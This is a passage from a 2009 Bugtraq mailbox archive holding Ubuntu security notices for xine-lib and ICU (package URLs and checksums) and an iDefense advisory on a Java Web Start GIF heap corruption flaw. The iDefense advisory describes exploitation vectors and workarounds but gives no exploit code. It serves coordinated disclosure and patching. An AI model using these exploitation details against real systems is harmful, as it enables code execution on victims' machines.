http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_amd64.deb
Size/MD5: 1300 1be987a3b431dab7a11423c407442e1c
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 331962 3519e5e211ac0cad798aa60c4a849288
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 1344010 6dadb820d74d559909208be4e14dfc0f
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 61400 578cbce2bdc4d595b8a692527caba7d1
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 4179676 a323d9c1a5c08de0998b14b8004604e6
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 392556 b160f84ca09e9937df160d540a179255
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 15062 8af12d1826ef1ea9860c5b254071df64
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 931050 4cb1f3722044e5600bdd2f47a9d182f4
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 212396 f6865eb3d8bd3db62927b23ecb103e01
http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_i386.deb
Size/MD5: 1304 49fdeabc2a19afd2373c9388d24542c1
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 331970 aa5c6d57f76da674d3786459a8badff7
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 1227008 f31dfb1198a1c13394a264ffb46b203d
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 60786 0167d08e60cd94b171954370a33a4556
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 3908218 501a5762f566a4eb9bb0917147ba3032
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 392472 b59c0580705f3d684a59aaff6028c0cc
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 15036 543dab3f22a50d076fb2c0406407f530
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 930218 40d546adfabfb90de5788806a7a92b9e
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 211434 c69f67d6611346acde544ba7c5c427ff
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_lpia.deb
Size/MD5: 1302 a849b16e9850fa376c54eb7e5738e9f3
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 331968 960929e7602647935024f4da09907570
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 1240800 89807d2cccad96e01ee05cc6c7430699
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 64684 009109dafc80cabf49f2d78fcce0d6fa
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 4016826 01aee7e37af3dd78e1f42baa08d138b1
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 425990 bfb0d13fb6b6dd3d69ed19a8f4262501
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 21622 753b36a137aa03c090b20c484316acb5
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 1119396 491f25071bc22fb8ae812a69a867ef01
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 225638 70cde5d8faa10f41f0d4c827b0cdef55
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_powerpc.deb
Size/MD5: 1314 3ff68c89fb33b569afab53bd6132c44d
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 331972 fbfaef3a3348ea0adb11a12809bbbba1
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 1220876 7a4fc40d366024d44287b3a9ffae8e60
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 51178 373c356eac258890a66dfbda46a957e7
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 3583032 b01b680f06d99b2335a3cbd8d5d3c9a2
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 400690 2cf2ada8e4dfc556b7f049940b3bb8fc
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 14664 fecc45a514a3fe37d86a9e301db440be
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 933820 88b74b50a11729ff715da479d12b902a
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 185908 1d7e345b1a33dce0745d2e5c46aefd07
http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_sparc.deb
Size/MD5: 1312 b60a69e409ad4fb8dc8643e2b821f06a
--=-4WqfmitOoPo1pECx714A
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAknL1yYACgkQLMAs/0C4zNpPPwCeIN6UXtl9vW4SpIUL19qd9Slm
AOgAn2wgzrj9o3sUxLuozpYamP+rEGDV
=ztHl
-----END PGP SIGNATURE-----
--=-4WqfmitOoPo1pECx714A--
From - Fri Mar 27 14:32:50 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006d3b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39850-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8A34AEC10B
for <lists@securityspace.com>; Fri, 27 Mar 2009 14:24:54 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6F2A82377DA; Fri, 27 Mar 2009 10:50:54 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26007 invoked from network); 26 Mar 2009 19:25:51 -0000
Subject: [USN-747-1] ICU vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound:
uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -13.1
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.149
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-j9z04Z7qbYV7tUufXLD+"
Date: Thu, 26 Mar 2009 15:28:21 -0400
Message-Id: <1238095701.13798.6.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.26.0
Status:
--=-j9z04Z7qbYV7tUufXLD+
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
===========================================================
Ubuntu Security Notice USN-747-1 March 26, 2009
icu vulnerability
CVE-2008-1036
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libicu34 3.4.1a-1ubuntu1.6.06.2
Ubuntu 7.10:
libicu36 3.6-3ubuntu0.2
Ubuntu 8.04 LTS:
libicu38 3.8-6ubuntu0.1
Ubuntu 8.10:
libicu38 3.8.1-2ubuntu0.1
After a standard system upgrade you need to restart applications linked
against libicu, such as OpenOffice.org, to effect the necessary changes.
Details follow:
It was discovered that libicu did not correctly handle certain invalid
encoded data. If a user or automated system were tricked into processing
specially crafted data with applications linked against libicu, certain
content filters could be bypassed.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.06.2.diff.gz
Size/MD5: 16244 dcba370b3c69ede4caada2cef6097a69
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a-1ubuntu1.6.06.2.dsc
Size/MD5: 627 c389b659aef98a101d3b809d1b9179b4
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.4.1a.orig.tar.gz
Size/MD5: 9039695 d45f59eb03b22cff127173cd3017f2e6
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu-doc_3.4.1a-1ubuntu1.6.06.2_all.deb
Size/MD5: 2916034 42b832f87d208c258594b016a27613d3
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.2_amd64.deb
Size/MD5: 5875686 b8d2da7ecb92b29b968cddc64e2dc745
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.2_amd64.deb
Size/MD5: 4792684 462550a7885baf62c31eaf830b6c7db0
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.2_i386.deb
Size/MD5: 5699948 5046cc627de4e5f664db86ed0fddbbb3
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.2_i386.deb
Size/MD5: 4738084 17eeb1616ef7872ba918d5016280380b
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.2_powerpc.deb
Size/MD5: 6049128 836759b1e1a985e8e8dc56e25dca5f2e
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.2_powerpc.deb
Size/MD5: 4942576 596e46c4eca4d82f0390b2498af68e76
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34-dev_3.4.1a-1ubuntu1.6.06.2_sparc.deb
Size/MD5: 5944400 14053337b91d73b2aa2ad6823d598acf
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu34_3.4.1a-1ubuntu1.6.06.2_sparc.deb
Size/MD5: 4870286 4aa90044609bfadd3571b74978e8de92
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.6-3ubuntu0.2.diff.gz
Size/MD5: 15909 0aa59cbaaef67c9c50054128e201456b
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.6-3ubuntu0.2.dsc
Size/MD5: 692 bfd481cc3f5af820727dac270cc1b287
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.6.orig.tar.gz
Size/MD5: 9778863 0f1bda1992b4adca62da68a7ad79d830
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu-doc_3.6-3ubuntu0.2_all.deb
Size/MD5: 3577674 4b122a4cf856fbe2d5d27fcec6342da4
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu36-dev_3.6-3ubuntu0.2_amd64.deb
Size/MD5: 6589590 f9efc15ce23dad80d430547d1b9077c5
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu36_3.6-3ubuntu0.2_amd64.deb
Size/MD5: 5497638 fb4da73e39f7c719964707b7748b204d
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu36-dev_3.6-3ubuntu0.2_i386.deb
Size/MD5: 6461466 5a4775a7961fc74fadd6cd020963be58
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu36_3.6-3ubuntu0.2_i386.deb
Size/MD5: 5507326 e9e3a6ce5f63e26633d0b68ea1bf75c2
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/i/icu/libicu36-dev_3.6-3ubuntu0.2_lpia.deb
Size/MD5: 6478988 bfbe625b13aa749d81c8f7ff807aaf12
http://ports.ubuntu.com/pool/main/i/icu/libicu36_3.6-3ubuntu0.2_lpia.deb
Size/MD5: 5505690 df250daa1fa2713c85ddb75a99b2af11
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu36-dev_3.6-3ubuntu0.2_powerpc.deb
Size/MD5: 6919500 701645321e08cd212a7785c06b477405
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu36_3.6-3ubuntu0.2_powerpc.deb
Size/MD5: 5851166 e4a595757c30c55a0c35a484607a213c
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu36-dev_3.6-3ubuntu0.2_sparc.deb
Size/MD5: 6784998 d676d1c5abc60a82eba7ca9405cd1c39
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu36_3.6-3ubuntu0.2_sparc.deb
Size/MD5: 5723330 5daa134cb3a8caca0d4e2a26fdbe1d7b
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.8-6ubuntu0.1.diff.gz
Size/MD5: 17433 91b7b1de2b89ebdcef23ab8e77fdc811
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.8-6ubuntu0.1.dsc
Size/MD5: 999 f908e68e219ca437d77519d7cf862534
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.8.orig.tar.gz
Size/MD5: 10515206 25a997240bb83a98d4515b6a88370314
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu-doc_3.8-6ubuntu0.1_all.deb
Size/MD5: 3657246 900ab0a246c578d6d4d4e6c5befca152
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/lib32icu-dev_3.8-6ubuntu0.1_amd64.deb
Size/MD5: 5997050 0e89eeddc3c6264d444366b45867c61d
http://security.ubuntu.com/ubuntu/pool/main/i/icu/lib32icu38_3.8-6ubuntu0.1_amd64.deb
Size/MD5: 5877840 3c6f4f4ae66a58f867342e661d72c985
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu-dev_3.8-6ubuntu0.1_amd64.deb
Size/MD5: 7040202 a71cb9ac380f57bf47fd907d9af34c8e
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu38-dbg_3.8-6ubuntu0.1_amd64.deb
Size/MD5: 2353324 8de67c16b3c0b30daee38915bfc901df
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu38_3.8-6ubuntu0.1_amd64.deb
Size/MD5: 5873082 6d69f425a495afbbb50016ff3108265e
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu-dev_3.8-6ubuntu0.1_i386.deb
Size/MD5: 6906146 181070f61f6ebc58b544d3651cf759da
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu38-dbg_3.8-6ubuntu0.1_i386.deb
Size/MD5: 2248552 aee284ce96037513a357c83ae3fcb8be
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu38_3.8-6ubuntu0.1_i386.deb
Size/MD5: 5876584 85065a4e8acba506070188b931186dfe
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/i/icu/libicu-dev_3.8-6ubuntu0.1_lpia.deb
Size/MD5: 6928392 01b4e4324639c8e9b7d01e75d058f5a2
http://ports.ubuntu.com/pool/main/i/icu/libicu38-dbg_3.8-6ubuntu0.1_lpia.deb
Size/MD5: 2285242 546e622d8f28e93bb1f7904d614f7b92
http://ports.ubuntu.com/pool/main/i/icu/libicu38_3.8-6ubuntu0.1_lpia.deb
Size/MD5: 5876428 89011d2b6df82e8394a522acafc68180
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/i/icu/libicu-dev_3.8-6ubuntu0.1_powerpc.deb
Size/MD5: 7373924 e2d4141adf969d1930cee65bb787a031
http://ports.ubuntu.com/pool/main/i/icu/libicu38-dbg_3.8-6ubuntu0.1_powerpc.deb
Size/MD5: 2345552 121930d8b9f8d46d63861c91dd906462
http://ports.ubuntu.com/pool/main/i/icu/libicu38_3.8-6ubuntu0.1_powerpc.deb
Size/MD5: 6235758 40686a9e91f303e3b62bda937c05ceee
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/i/icu/libicu-dev_3.8-6ubuntu0.1_sparc.deb
Size/MD5: 7245714 cdb3c8b31b9e7d06d8a5f8b1902573f8
http://ports.ubuntu.com/pool/main/i/icu/libicu38-dbg_3.8-6ubuntu0.1_sparc.deb
Size/MD5: 2124956 27dda5d787b2721e4a9d8831e2188c91
http://ports.ubuntu.com/pool/main/i/icu/libicu38_3.8-6ubuntu0.1_sparc.deb
Size/MD5: 6106468 0edb46093a85263adfbfde054a7dd66a
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.8.1-2ubuntu0.1.diff.gz
Size/MD5: 20684 e29cd0d24c6eff8df6aa84b3870436a7
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.8.1-2ubuntu0.1.dsc
Size/MD5: 1389 2bdd4abf5a9a4b4d9adb778995a516dc
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu_3.8.1.orig.tar.gz
Size/MD5: 10591204 ca52a1eb5050478f5f7d24e16ce01f57
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/i/icu/icu-doc_3.8.1-2ubuntu0.1_all.deb
Size/MD5: 3657524 f53a4fe91321a48c000f3dacf5831ebf
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/lib32icu-dev_3.8.1-2ubuntu0.1_amd64.deb
Size/MD5: 6063168 94e72e7c83473542ca163d0814d023b9
http://security.ubuntu.com/ubuntu/pool/main/i/icu/lib32icu38_3.8.1-2ubuntu0.1_amd64.deb
Size/MD5: 5926752 fd9b6a51d6ceec5c3def8a17940ac839
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu-dev_3.8.1-2ubuntu0.1_amd64.deb
Size/MD5: 7124714 22ba2900462f28661b35c45313278386
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu38-dbg_3.8.1-2ubuntu0.1_amd64.deb
Size/MD5: 2422072 70543124daaec75cf7ece7f399f03c2e
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu38_3.8.1-2ubuntu0.1_amd64.deb
Size/MD5: 5935486 df58d1b4e2c97fa03b322e2d57d7f40d
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu-dev_3.8.1-2ubuntu0.1_i386.deb
Size/MD5: 6979534 60bb47b69df7623fdbd1cfd72dbc8399
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu38-dbg_3.8.1-2ubuntu0.1_i386.deb
Size/MD5: 2294250 8fd201cda783cb232fbd86526c45989f
http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu38_3.8.1-2ubuntu0.1_i386.deb
Size/MD5: 5925606 939a221f55d9ba035ade57ca7df826ae
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/i/icu/libicu-dev_3.8.1-2ubuntu0.1_lpia.deb
Size/MD5: 6991368 1d90c0dce7d8ebc583f7e236e5d9c866
http://ports.ubuntu.com/pool/main/i/icu/libicu38-dbg_3.8.1-2ubuntu0.1_lpia.deb
Size/MD5: 2325380 ef6431dd1b7932a5e19e582267f6b858
http://ports.ubuntu.com/pool/main/i/icu/libicu38_3.8.1-2ubuntu0.1_lpia.deb
Size/MD5: 5918506 d7fedf038baecb191c99a6afb7d8bc50
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/i/icu/libicu-dev_3.8.1-2ubuntu0.1_powerpc.deb
Size/MD5: 7453914 b353f8f570a196ef114dc6ba0dbfb8f1
http://ports.ubuntu.com/pool/main/i/icu/libicu38-dbg_3.8.1-2ubuntu0.1_powerpc.deb
Size/MD5: 2404798 d706e47bf92812dc4ea05f5743e20d89
http://ports.ubuntu.com/pool/main/i/icu/libicu38_3.8.1-2ubuntu0.1_powerpc.deb
Size/MD5: 6297760 773cabdc4bfc7d11b0bf43e6f5b3361d
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/i/icu/libicu-dev_3.8.1-2ubuntu0.1_sparc.deb
Size/MD5: 7310418 cff10011702e40730ab226fa42f7dcca
http://ports.ubuntu.com/pool/main/i/icu/libicu38-dbg_3.8.1-2ubuntu0.1_sparc.deb
Size/MD5: 2155336 122d757002a50ee8bb48103e132fb995
http://ports.ubuntu.com/pool/main/i/icu/libicu38_3.8.1-2ubuntu0.1_sparc.deb
Size/MD5: 6149156 db33747648e2baf54cf5791aa9574686
--=-j9z04Z7qbYV7tUufXLD+
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAknL11IACgkQLMAs/0C4zNpRUQCguNzFDkn8Bjdw/KvssVSMqETv
/dcAn0t7pyiE3b2qEnzcY7tIZajUIkDm
{sc
-----END PGP SIGNATURE-----
--=-j9z04Z7qbYV7tUufXLD+--
From - Fri Mar 27 14:42:50 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006d3c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39851-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 64D5EEC111
for <lists@securityspace.com>; Fri, 27 Mar 2009 14:34:29 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 463B02379C1; Fri, 27 Mar 2009 10:52:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26309 invoked from network); 26 Mar 2009 19:46:40 -0000
Message-ID: <49CBDBB6.2000804@idefense.com>
Date: Thu, 26 Mar 2009 15:47:02 -0400
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.21 (Windows/20090302)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 03.26.09: Sun Java Web Start (JWS ) GIF
Decoding Heap Corruption Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDefense Security Advisory 03.25.09
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 25, 2009
I. BACKGROUND
Java Web Start (JWS) is a framework built by Sun that is used to run
Java applications outside of the browser. It is distributed with the
Java Runtime Environment (JRE) installation. JWS is typically launched
by clicking on a link in the browser and results in a separate process
being started that is not tied to the JVM inside the browser. In order
to accomplish this, the Java Network Launching Protocol (JNLP) is used
to communicate with the JWS process. This is done by referencing a
.jnlp file from the Web page, which is then requested and forwarded to
the JWS application. This XML-based file contains various parameters
that describe the Java application to be run.
II. DESCRIPTION
Remote exploitation of a heap corruption vulnerability in Sun
Microsystems Inc.'s Java Web Start could allow an attacker to execute
arbitrary code with privileges of the current user.
When JWS starts up, it displays a splash screen. By default, the image
displayed on this splash screen is a GIF file provided by Sun, but it
is possible for a JNLP file to provide its own splash logo. This allows
an attacker to pass an arbitrary GIF file to the splash logo parsing
code to trigger the vulnerability.
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user running JWS. There are several ways
to exploit this vulnerability. The most common exploitation vector is
through the browser. By persuading a user to follow a link (or by
compromising a trusted site), the vulnerability can be exploited by
simply viewing a webpage. It would also be possible for an attacker to
e-mail a JNLP file to a user or place it on a shared network drive. In
this situation, a targeted user would need to manually open the file.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Java Web
Start version 1.6_11 on Windows and Linux. Previous versions may also
be affected.
Sun Microsystems reports that the vulnerability can occur in the
following Java SE and Java SE for Business releases for Windows,
Solaris, and Linux:
* JDK and JRE 6 Update 12 and earlier
* JDK and JRE 5.0 Update 17 and earlier
and in the following Java SE for Business release for Windows, Solaris,
and Linux:
* SDK and JRE 1.4.2_19 and earlier
and in the following Java SE release for Windows and Solaris:
* SDK and JRE 1.3.1_24 and earlier
V. WORKAROUND
On Windows, it is possible to prevent automatic exploitation by
double-clicking such a file, or opening it through the browser by
removing the file associations for JNLP files. If a user specifically
selects the Java Web Start application to open the JNLP file, however,
exploitation is still possible. This can be done by removing the
registry key for .jnlp in the 'HKEY_CLASSES_ROOT' registry hive.
An additional workaround which will prevent all exploitation attempts is
to rename the splashscreen library so that Java Web Start will not be
able to load it. This file is found in different locations depending on
the platform and installation choices. One such location is:
C:\Program Files\Java\jre6\bin\splashscreen.dll
Renaming this file to splashscreen.dll.bak will prevent it from being
loaded.
VI. VENDOR RESPONSE
Sun Microsystem Inc. has released a patch which addresses this issue.
For more information, consult their advisory at the following URL:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-254571-1
VII. CVE INFORMATION
A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.
VIII. DISCLOSURE TIMELINE
02/18/2009 - Initial Contact
02/18/2009 - PoC Requested
02/19/2009 - PoC Sent
03/10/2009 - Disclosure Date Set
03/25/2009 - Coordinated Public Disclosure
IX. CREDIT
This vulnerability was reported to iDefense by regenrecht.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright � 2009 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
